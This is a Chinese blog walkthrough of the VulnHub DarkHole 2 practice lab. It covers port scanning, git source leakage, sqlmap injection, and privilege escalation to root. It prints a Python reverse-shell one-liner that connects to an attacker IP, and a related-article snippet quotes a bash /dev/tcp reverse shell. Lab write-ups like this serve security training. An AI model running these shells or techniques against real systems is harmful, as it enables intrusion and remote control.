DarkHole: 2 vulnhub walkthrough

DarkHole 2 渗透测试实战指南
最新推荐文章于 2025-09-04 19:37:26 发布
原创 最新推荐文章于 2025-09-04 19:37:26 发布 · 627 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试

本文详细介绍了在VulnHub上的DarkHole 2靶场进行渗透测试的过程。从主机和端口发现开始,通过访问Web服务、尝试目录爆破、利用git目录提取代码,然后通过SQL注入获取用户名和密码,接着使用sqlmap自动化工具。成功登录后,发现进程并利用其创建一句话shell,进一步提升权限到root,最终获取到root权限的flag。

下载地址:

https://www.vulnhub.com/entry/darkhole-2,740/

主机和端口发现:

➜  ~ nmap -sn 192.168.143.0/24
Host is up (0.00010s latency).
Nmap scan report for 192.168.143.206

➜  ~ nmap -T4 -v -p- 192.168.143.206
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

访问web服务,有一个登录页面:

login

尝试注入失败,于是dirb爆破一下目录:

dirb

发现了git目录,于是使用git_extract提取目标代码,首先查看login.php

<?php
session_start();
require 'config/config.php';
if($_SERVER['REQUEST_METHOD'] == 'POST'){
    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
        $_SESSION['userid'] = 1;
        header("location:dashboard.php");
        die();
    }

}
?>

获取用户名和密码后登录,发现一处注入点。

sqlinject

直接使用sqlmap进行自动化注入,需要注意的是需要cookie,在ssh表中得到了用户名和密码:

+--------+------+
| user   | pass |
+--------+------+
| jehad  | fool |
+--------+------+

ssh登录,进入/home/losy,获取到用户flag。

jehad@darkhole:/home/losy$ cat user.txt
DarkHole{'This_is_the_life_man_better_than_a_cruise'}

查看进程,发现一个进程。

localphp

查看后是本地写了一个一句话shell,利用它反弹一个用户losy的shell,这里使用python反弹shell。

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.143.135",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

进行url编码后作为cmd输入,成功切换到用户losy

losy

查看.bash_history,获取losy用户密码gang

password

查看sudo,发现可以运行python3,成功获取root。

root

Vulnhub-DARKHOLE: 2
Re1_zf的博客
02-06 383
1、git源码泄露可以用git相关命令,比如git log和git show,都可以快速定位敏感信息2、sqlmap进行测试时,有时网站需要指定cookie3、ssh -L可以进行端口转发,语法类参考ssh -L 9999:127.0.0.1:9999 jehad@192.168.64.1374、脚本反弹shell5、.bash_history很有可能隐藏着敏感信息6、简单的sudo提权。
DarkHole_2
追求卓越,技术流~
01-14 1735
文章目录靶机环境一、信息收集二、 漏洞利用三、权力提升总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机:DarkHole_2 IP:192.168.247.131 一、信息收集 输入:nmap -A -T4 -sV -p- 192.168.247.131 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST Nmap scan report for 192.168.247.131 Host is u
DarkHole: 2靶场渗透
最新发布
sucker的博客
09-04 1105
10,再重新登陆 ssh,将本地端口 9999 端口与远程主机端口映射,访问本地端口转发到远程主机.这一步是 sqlmap 的启发式检测,没发现明显异常,但不代表不存在注入。注意到nmap扫描出存在/.git目录,可以通过/.git/得到网页源代码。存在三个用户,那么应该不会直接提权成为root,而是先横向移动到其他用户上。发现一些和黑客入侵痕迹的历史命令,而且本地有9999端口的服务.8,注意到传参方式是通过id进行的,再次尝试手工sql注入。6,直接开始原汁原味的手工sql注入。
VulnHub-DarkHole_2靶机渗透教程
苏生要努力
04-23 1268
直接使用VMware导入打开就行注意:靶机的网络连接模式必须和kali一样,让靶机跟kali处于同一网段,这样kali才能扫出靶机的地址。
Vulnhub靶场】DARKHOLE: 2
DG_s1mple
03-23 1855
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
vulnhubdarkhole_2
weixin_54431413的博客
07-04 881
首先进行了下载了.git,对其中各个版本源码来审计,拿到后台登录权限,之后利用sql注入拿到jhead的密码。通过对.bash_history的查看,发现了本地执行用户为lucy的9999的命令执行漏洞,水平提权到lucy,通过对lama的暴力破解拿到root,通过lucy的sudo提权...
MOMENTUM: 2 vulnhub walkthrough
xdeclearn的博客
07-19 468
信息 Momentum2.ova (Size: 698 MB) Download (Mirror): https://download.vulnhub.com/momentum/Momentum2.ova Download (Torrent): https://download.vulnhub.com/momentum/Momentum2.ova.torrent ( Magnet) 端口扫描和目录扫描 PORT STATE SERVICE 22/tcp open ssh 80/tcp open
VulnHub系列』dpwwn: 2-Walkthrough
ins1ght的博客
11-03 1139
靶机发布日期:2019年8月8日,靶机难度:中等+。NFS共享配合LFI打了个getshell的组合拳,之后利用SUID权限的find命令配合chmod命令为/bin/bash赋予SUID权限成功提权。思路感觉还可以,有点骚气~
VulnHub系列』serial: 2-Walkthrough
ins1ght的博客
11-10 2128
靶机发布日期:2019年9月27日,难度:中等++。用到了apk逆向和ELF中的ROP技术,web狗(小白)表示伤不起,一路硬刚下来的,求鼓励~
VulnHub系列』WTF: 1-Walkthrough
ins1ght的博客
12-14 1917
这是个人完成的第27个VulnHub上的靶机。靶机发布日期:2019年11月22日,难度:中等。 标签:MiTM、/usr/bin/pip提权
EVM: 1-WalkthroughVulnHub靶场】渗透测试实战系列2
重新启程
12-03 706
靶场地址:EVM: 1 这个靶机比较特殊的地方,不是用dhcp生成地址,必须用host网络,靶机的地址必须为192.168.56.103。 至于怎么做到,小伙伴自行脑补,有助于手臂锻炼。呵呵! 搞定上面的准备工作之后,拿出kali,先扫一下地址和端口: 用enum4linux对smb扫描了一下,没有什么特别有用的信息 就直接打开80web看看情况,扫描了一下目录,发现有word...
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1819
vulnhub靶场 DarkHole: 2,难度:困难级别
VulnhubDARKHOLE: 2渗透测试
Bird&Bird
01-11 4070
目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali:192.168.110.128 靶机:192.168.110.137 2、信息搜集 首先探测靶机IP地址 扫一下端口和服务,可知靶机只开启了2
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 326
DarkHole2
DARKHOLE: 2
weixin_45042115的博客
10-05 1985
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神器对局域网主机开放服务端口进行扫描,瞅瞅有没有可以利用端口 nmap -v -T4 -sC -sV -p- 100.100.100.0/24 发现有100.100.100.132 主机有wbe页面 这个应该就此此次的目标了,对它单独的扫描一次,收集更多信息 发现开放22端口和80端口,即对应的远程连接
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 8354
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
DARKHOLE 2
Czheisenberg的博客
02-18 852
vulnhub靶场——DarkHole 2 WriteUp
darkhole2
qq_62144749的博客
09-02 528
vulnhub darkhole2
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1542
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2
VulnHub靶机实战教程:全面解析与 Walkthrough
教程内容包括多个VulnHub靶机的walkthrough,如AI:Web:2、bossplayersCTF:1、Bottleneck:1、DC系列等,覆盖了多种攻防技术。" 正文: VulnHub是一个在线平台,提供了各种虚拟环境,用于模拟真实世界的网络安全漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值